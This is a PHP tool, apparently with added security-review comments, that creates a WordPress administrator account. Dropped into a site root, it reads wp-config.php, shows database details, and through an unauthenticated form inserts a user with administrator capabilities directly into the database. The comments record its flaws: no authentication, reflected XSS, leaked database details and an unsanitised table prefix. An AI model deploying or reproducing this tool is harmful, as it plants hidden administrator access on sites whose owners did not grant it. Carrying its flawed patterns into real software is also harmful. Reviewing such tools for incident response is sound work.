- <?php
- /******************************
- * Oneclick Wordpress Admin User Creator
- * Author - CHETAN SONI
- * Twitter - http://twitter.com/iamchetansoni
- * ****************************/
- // configurables
- // $wpconf is a relative path, so it is resolved against the current working directory.
- // $usrtbl / $usrmta are table names without the prefix; the prefix is substituted at run time.
- $wpconf = "wp-config.php";
- $usrtbl = "users";
- $usrmta = "usermeta";
- // sql data
- // Query templates. The %name% tokens are replaced by filter() with values taken from the
- // submitted form. Every value lands inside a quoted SQL literal, and %prefix% also lands
- // inside a back-quoted identifier, so these statements are only as safe as the values
- // substituted into them. Prepared statements would remove that dependency.
- // NOTE(review): the password is stored as MD5('...'), an unsalted fast hash. WordPress has
- // historically accepted such legacy hashes and replaced them at the next login; confirm for
- // the version in use.
- $sqltbl = "INSERT INTO `%prefix%$usrtbl` (`user_login`,`user_pass`,`user_nicename`,`user_email`,`user_url`,`user_registered`,`user_activation_key`,`user_status`,`display_name`) VALUES ('%usrname%',MD5('%usrpass%'),'%usrnice%','%usrmail%','',NOW(),'','0','%usrnice%')";
- // Looks up the id of the row inserted by $sqltbl, matching on the login name.
- $sqlid = "SELECT `id` FROM `%prefix%$usrtbl` WHERE `user_login` = '%usrname%'";
- // meta_value is a PHP-serialized one-element array mapping "administrator" to "1",
- // stored under the meta key <prefix>capabilities.
- $sqlmta = "INSERT INTO `%prefix%$usrmta` (`user_id`,`meta_key`,`meta_value`) VALUES ('%usrid%','%prefix%capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}')";
- // Second metadata row: <prefix>user_level set to 10.
- $sqlmta2 = "INSERT INTO `%prefix%$usrmta` (`user_id`,`meta_key`,`meta_value`) VALUES ('%usrid%','%prefix%user_level','10')";
- // defaults
- // Form fields start empty; $errors collects validation and query failures for display.
- $prefix = "wp_";
- $usrname = "";
- $usrpass = "";
- $usrnice = "";
- $usrmail = "";
- $errors = array();
- // helper functions
/**
 * Print one alert box.
 *
 * Both arguments are written into the page as raw HTML: the callers on this
 * page pass literal markup (for example <b>...</b>), so nothing is escaped
 * here. Never pass request data to this function.
 *
 * @param string $msg  HTML shown inside the box.
 * @param string $type Extra CSS class appended after "alert".
 * @return void
 */
function msg($msg, $type = "")
{
    $opening = '<div class="alert ' . $type . '">';
    echo $opening . $msg . "</div>\n";
}
/**
 * Run a query and return the `id` column of its first row.
 *
 * Uses the legacy mysql_* API on the most recently opened connection. The @
 * operators hide every warning, so a failed query or an empty result is not
 * reported: the function simply returns whatever $record['id'] evaluates to
 * (null when no row was fetched). Callers should check the result before
 * using it in another statement.
 *
 * @param string $query Complete SELECT statement.
 * @return mixed The `id` value of the first row, or null when there is none.
 */
function getusrid($query)
{
    $handle = @mysql_query($query);
    $record = @mysql_fetch_array($handle, MYSQL_ASSOC);

    return $record['id'];
}
/**
 * Print a list of messages inside a single alert box.
 *
 * Nothing is printed for an empty list. Each entry is written as raw HTML
 * followed by a line break; entries are not escaped, so they must not
 * contain request data.
 *
 * @param array  $arr     Messages to show, one per line.
 * @param string $classes Extra CSS classes appended after "alert".
 * @return void
 */
function box($arr, $classes = "")
{
    if (count($arr) <= 0) {
        return;
    }

    $html = "<div class=\"alert $classes\">\n";
    foreach ($arr as $line) {
        $html .= "$line<br />\n";
    }
    $html .= "</div>\n";

    echo $html;
}
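/**
 * Fill the %placeholder% tokens of an SQL template.
 *
 * Each replacement value is escaped for use inside a quoted SQL string
 * literal before it is substituted. The previous version substituted the raw
 * values (its escaping code was commented out) and, with magic_quotes_gpc
 * enabled, ran stripslashes() over the finished query, which removed the only
 * escaping the values had.
 *
 * Escaping does not make a value safe where the template uses it as an
 * identifier (the back-quoted `%prefix%users` table name): callers still have
 * to restrict the table prefix to an allow-list such as [A-Za-z0-9_]+.
 * Prepared statements (mysqli or PDO) are the durable fix.
 *
 * @param string       $input SQL template containing the tokens listed in $keys.
 * @param array|string $keys  Token(s) to look for.
 * @param array|string $vals  Replacement value(s), in the same order as $keys.
 * @return string The template with every token replaced by its escaped value.
 */
function filter($input, $keys = array(), $vals = array())
{
    $unquote = (bool) ini_get('magic_quotes_gpc');
    $wasArray = is_array($vals);
    $safe = array();

    foreach ((array) $vals as $value) {
        $value = (string) $value;

        // magic_quotes_gpc adds its own backslashes; remove them from the
        // value first so it is escaped exactly once below.
        if ($unquote) {
            $value = stripslashes($value);
        }

        // Prefer the connection-aware escaper when ext/mysql is loaded.
        // addslashes() is only a fallback: it is not character-set aware.
        $escaped = false;
        if (function_exists('mysql_real_escape_string')) {
            $escaped = mysql_real_escape_string($value);
        }
        if ($escaped === false) {
            $escaped = addslashes($value);
        }

        $safe[] = $escaped;
    }

    // Keep str_replace()'s scalar form when the caller passed a scalar.
    if (!$wasArray) {
        $safe = isset($safe[0]) ? $safe[0] : '';
    }

    return str_replace($keys, $safe, $input);
}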
- ?><!DOCTYPE html>
- <html>
- <head>
- <title>Oneclick Wordpress Admin User Creator</title>
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0-wip/css/bootstrap.min.css">
- <script src="//netdna.bootstrapcdn.com/bootstrap/3.0.0-wip/js/bootstrap.min.js"></script>
- <script src="//code.jquery.com/jquery.js"></script>
- <style type="text/css">
- body { background: #000000; }
- a { color: #bf4c26; }
- a:hover { color: #222; }
- .wrapper { background: white; border: 1px solid #eee; padding: 10px; width: 800px; margin: 30px auto 0; border-radius: 12px; }
- .ver { width: 800px; margin: 5px auto; color: #999; font-size: 11px; }
- .theform { display: block; border: 1px solid #efefef; padding: 10px; margin: 10px 0; border-radius: 6px;}
- </style>
- </head>
- <body>
- <center><img src="http://i.imgur.com/3GqsquD.png"></center>
- <div class="wrapper">
- <center> <h2> <b>Oneclick Wordpress Admin User Creator</b></h2></center><hr>
- <?php
- // Main page flow: locate wp-config.php, connect to the database it describes, and, when the
- // form below has been submitted, insert a user row plus two usermeta rows built from the
- // templates above.
- // NOTE(review): nothing on this page authenticates the requester or checks a CSRF token.
- // Any client that can request this file can create an administrator account, so the file
- // should never remain in a web root. Responders who find it on a server should review the
- // users and usermeta tables for accounts nobody can account for.
- if (file_exists($wpconf)):
- // wp config file found
- // include_once executes the whole configuration file; the code below only relies on the
- // DB_* constants it defines.
- include_once($wpconf);
- if (defined('DB_NAME')&&defined('DB_USER')&&defined('DB_PASSWORD')&&defined('DB_HOST')):
- // db data found
- // NOTE(review): the labels are swapped (DB_USER is printed as "Database Name" and DB_NAME as
- // "Database User"), and both values are disclosed to every visitor of the page.
- echo "<center>Yippie we got the details, <span style=\"color: green\">Database Name = <b>".DB_USER."</b></span> and <span style=\"color: green\">Database User = <b>".DB_NAME."</b></span></center>";
- // The mysql_* functions used from here on belong to ext/mysql, which was removed in PHP 7.
- // The @ operator hides connection warnings; failure is handled by the else branches below.
- if ($dbc = @mysql_connect(DB_HOST,DB_USER,DB_PASSWORD)):
- // sql connect successful
- if (@mysql_select_db(DB_NAME)):
- // sql db select successful
- echo "<span style=\"color: green\"><b></b></span>\n<br />";
- if (isset($_POST['sub'])):
- // form submitted, process and show results
- //print_r($_POST);
- // Each field is only checked for presence and non-zero length, then trimmed. No format or
- // character validation is applied, including to the table prefix, which the templates place
- // inside a back-quoted identifier.
- if (isset($_POST['prefix'])&&(strlen($_POST['prefix'])>0)): $prefix = trim($_POST['prefix']); else: $errors[] = "You did not fill in the table prefix"; endif;
- if (isset($_POST['usrname'])&&(strlen($_POST['usrname'])>0)): $usrname = trim($_POST['usrname']); else: $errors[] = "You did not fill in the username"; endif;
- if (isset($_POST['usrpass'])&&(strlen($_POST['usrpass'])>0)): $usrpass = trim($_POST['usrpass']); else: $errors[] = "You did not fill in the password"; endif;
- if (isset($_POST['usrnice'])&&(strlen($_POST['usrnice'])>0)): $usrnice = trim($_POST['usrnice']); else: $errors[] = "You did not fill in the display username"; endif;
- if (isset($_POST['usrmail'])&&(strlen($_POST['usrmail'])>0)): $usrmail = trim($_POST['usrmail']); else: $errors[] = "You did not fill in the email address"; endif;
- if (count($errors)==0):
- // form submitted successfully
- // Step 1: insert the user row.
- $sqltbl = filter($sqltbl,array("%prefix%","%usrname%","%usrpass%","%usrnice%","%usrmail%"),array($prefix,$usrname,$usrpass,$usrnice,$usrmail));
- if ($result = @mysql_query ($sqltbl)):
- // Step 2: read back the new row's id, then insert the capabilities and user_level metadata.
- // NOTE(review): $id is not checked; if the lookup returns nothing, the metadata rows are
- // still attempted with an empty user_id.
- $sqlid = filter($sqlid,array("%prefix%","%usrname%"),array($prefix,$usrname));
- $id = getusrid($sqlid);
- $sqlmta = filter($sqlmta,array("%prefix%","%usrid%"),array($prefix,$id));
- $sqlmta2 = filter($sqlmta2,array("%prefix%","%usrid%"),array($prefix,$id));
- // NOTE(review): raw mysql_error() text is appended to the messages and later printed
- // unescaped by box(), exposing database details in the page.
- if (!@mysql_query ($sqlmta)): $errors[] = "<b>Failed to add user metadata!</b> ".mysql_error(); endif;
- if (!@mysql_query ($sqlmta2)): $errors[] = "<b>Failed to add user metadata #2!</b> ".mysql_error(); endif;
- else: $errors[] = "<b>Failed to add user!</b> ".mysql_error();
- endif;
- //echo "$sqltbl<br />$sqlid<br />$sqlmta<br />$sqlmta2";
- if (count($errors)==0):
- box(array("<b>User added successfully.</b><br />Please login to your dashboard, <a href=\"wp-admin/\">Click Here</a>."),"alert-success");
- endif;
- endif;
- endif;
- // display form
- // NOTE(review): the form below echoes the submitted values back into value="..." attributes
- // without htmlspecialchars(), so a quote in any field breaks out of the attribute (reflected
- // XSS), and the submitted password is written back into the page source.
- // NOTE(review): the prefix input carries two value attributes and echoes $usrprefix, a
- // variable that is never assigned on this page (the value is held in $prefix).
- box($errors,"alert-danger");
- ?>
- <form role="form" action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="POST" class="theform form-horizontal">
- <div class="row">
- <fieldset>
- <div class="form-group">
- <label for="prefix" class="col-lg-2 control-label">Table prefix</label>
- <div class="col-lg-3"><input type="text" class="form-control" name="prefix" id="prefix" placeholder="username" value="wp_" value="<?php echo $usrprefix; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrname" class="col-lg-2 control-label">Username</label>
- <div class="col-lg-6"><input type="text" class="form-control" name="usrname" id="usrname" placeholder="Enter New Username" value="<?php echo $usrname; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrpass" class="col-lg-2 control-label">Password</label>
- <div class="col-lg-6"><input type="password" class="form-control" id="usrpass" name="usrpass" placeholder="Enter New Password" value="<?php echo $usrpass; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrnice" class="col-lg-2 control-label">Display Name</label>
- <div class="col-lg-6"><input type="text" class="form-control" name="usrnice" id="usrnice" placeholder="Enter Your Display Name" value="<?php echo $usrnice; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrmail" class="col-lg-2 control-label">E-mail ID</label>
- <div class="col-lg-6"><input type="email" class="form-control" name="usrmail" id="usrmail" placeholder="Enter Your E-mail ID" value="<?php echo $usrmail; ?>"></div>
- </div>
- <div class="form-group">
- <div class="col-lg-offset-2 col-lg-6">
- <button type="submit" class="btn btn-primary">Add User</button>
- </div>
- </div>
- </fieldset>
- </div>
- <input type="hidden" name="sub" value="0">
- </form>
- <?
- // NOTE(review): this section is reopened with the short open tag, which is only parsed when
- // short_open_tag is enabled. With it disabled, the if-blocks opened above are never closed.
- // The full opening tag should be used here.
- mysql_close($dbc);
- else:
- // sql select failed
- msg("Unable to select the database.","alert-danger");
- endif;
- else:
- // unable to connect to sql
- msg("Unable to connect the database.","alert-danger");
- endif;
- else:
- // missing db data
- // NOTE(review): this branch runs when the DB_* constants are missing after including
- // wp-config.php, yet the message names wp-login.php.
- msg("Check your <b>wp-login.php</b> file","");
- endif;
- else:
- // missing wp config file
- msg("Unable to locate <b>wp-config.php</b>. Make sure you have uploaded this script to the root of your Wordpress installation.","alert-danger");
- endif;
- ?>
- </div><!--wrapper-->
- </body>
- </html>